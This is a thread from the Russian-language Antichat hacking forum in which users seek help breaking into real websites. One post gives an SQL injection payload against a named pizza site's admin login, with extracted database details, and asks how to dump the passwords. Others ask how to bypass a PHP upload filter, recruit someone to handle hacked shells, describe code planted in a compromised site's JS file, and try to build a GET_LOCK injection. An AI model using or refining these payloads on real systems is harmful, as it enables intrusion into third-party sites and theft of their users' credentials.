ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.05.2020, 23:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от FireRidlle
FireRidlle said:
↑
есть варианты как можно обойти ситауцию когда иньекция попадает в два запроса с раным количеством колонок и все же воспользоватся union based
Есть как минимум два уязвимых запроса, а может быть три или больше, случай не простой, есть над чем подумать и развернуться. Стоит посмотреть в сторону фрагментированных инъекций или объединённых запросов, варианты есть и пока они не проверены, утверждать однозначно нельзя. В текущем состоянии дел, всё сильно зависит от окружения, контекста и соответсвенно выбранного вектора атаки. Думаю, что на этом моменте, не имеет смысла описывать абстракные техники, уже не целесообразно, нужно работать с конкретным случаем напрямую.
Это что касается инъекции, но вполне возможно, что классическая схема SQLi => Admin => RCE, в данном случае будет куда предпочтительнее, чем просто видимая скуля.
|
|
|
|

22.05.2020, 17:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
SQLi в Oracle с подлючением все нормально
|
|
|
|

24.05.2020, 15:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 61136
Репутация:
32
|
|
Есть возможность обойти?
Код:
Code:
$dir = './img/';
$name = $dir . basename($_FILES['uploadfile']['name']);
$ext = substr($_FILES['uploadfile']['name'],strpos($_FILES['uploadfile']['name'],'.'),strlen($_FILES['uploadfile']['name'])-1);
$filetypes = array('.bmp','.jpg','.png','.jpeg','.gif','.BMP','.JPG','.PNG','.JPEG','.GIF');
if(!in_array($ext,$filetypes)){
echo "Данный формат файлов не поддерживается";
}else{
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $name)) {
echo "Изображение загружено";
} else {
echo "Ошибка";
}
}
|
|
|
|

28.05.2020, 21:35
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Здравствуйте, помогите пожалуйста извлечь пароли, никак не получается (пароли идут blob)
Код:
Code:
doma-pizza.ru/admin/login/
поле login
admin') AND EXTRACTVALUE(7257,CONCAT(0x5c,0x717a7a7871,(SELECT (ELT(7257=7257,1))),0x717a787671)) AND ('sIKG'='sIKG&password=admin&submit=%D0%92%D1%85%D0%BE%D0%B4
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'
Таблица: PS_USER
Колонки: PS_USER_LOGIN,PS_USER_PASSWORD
Пробовал так как тут указывали, но ничего не вышло
/threads/431199/page-53#post-4390194
|
|
|

29.05.2020, 18:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 955
Репутация:
0
|
|
Всем привет. Нужен рутальщик для лома/шелов ссылок.
Телеграм: @santa_moonride
|
|
|
|

29.05.2020, 18:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 759330
Репутация:
147
|
|
Сообщение от CrispyChikHotty
CrispyChikHotty said:
↑
Нужен рутальщик
нормального рутальщика щас хрен где найдёшь!
|
|
|
|

29.05.2020, 20:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 955
Репутация:
0
|
|
Сообщение от ms13
ms13 said:
↑
нормального рутальщика щас хрен где найдёшь!
Буду надеяться, что он сам меня найдёт : D
|
|
|
|

30.05.2020, 17:12
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
Не подскажите, есть сайт на ColdFusion 2018, два дня назад поставил свой код в js файл, проблема в том, что мой код то появляется, то его нету это со стороны обычного пользователя. Попытался 10 раз обновить страницу его нет, зашел на следующий день код есть. А если через шелл чекнуть то мой код постоянно в файле. Не понял истинную причину такого поведения. Вроде сайт на одном сервере, кэш сервера - прошло достаточно времени, кэш бразуера - я его постоянно чищу
|
|
|

30.05.2020, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 1238
Репутация:
0
|
|
Всем привет. Возник вопрос.
Есть запрос вида
Код:
Code:
https://site/dynamic/pin/?pin=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&activate=1
Получаю ошибку:
Код:
Code:
SQLSTATE[42000]: Syntax error or access violation: 3057 Incorrect user-level lock name 'WP_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
Гугление ошибки привело к тому, что возможно я имею дело с функцией GET_LOCK() в mysql. И возможен такой вектор:
Код:
Code:
(concat(version(),repeat(0x1,99)),0)
Но к сожалению у меня не получается правильно составить запрос. Как отбросить префикс базы, который вываливается в ошибке и корректно составить запрос?
Спасибо, буду признателен за помощь.
|
|
|
|

01.06.2020, 16:52
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
Вопрос все еще актуален, есть у кого-нибудь идеи?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|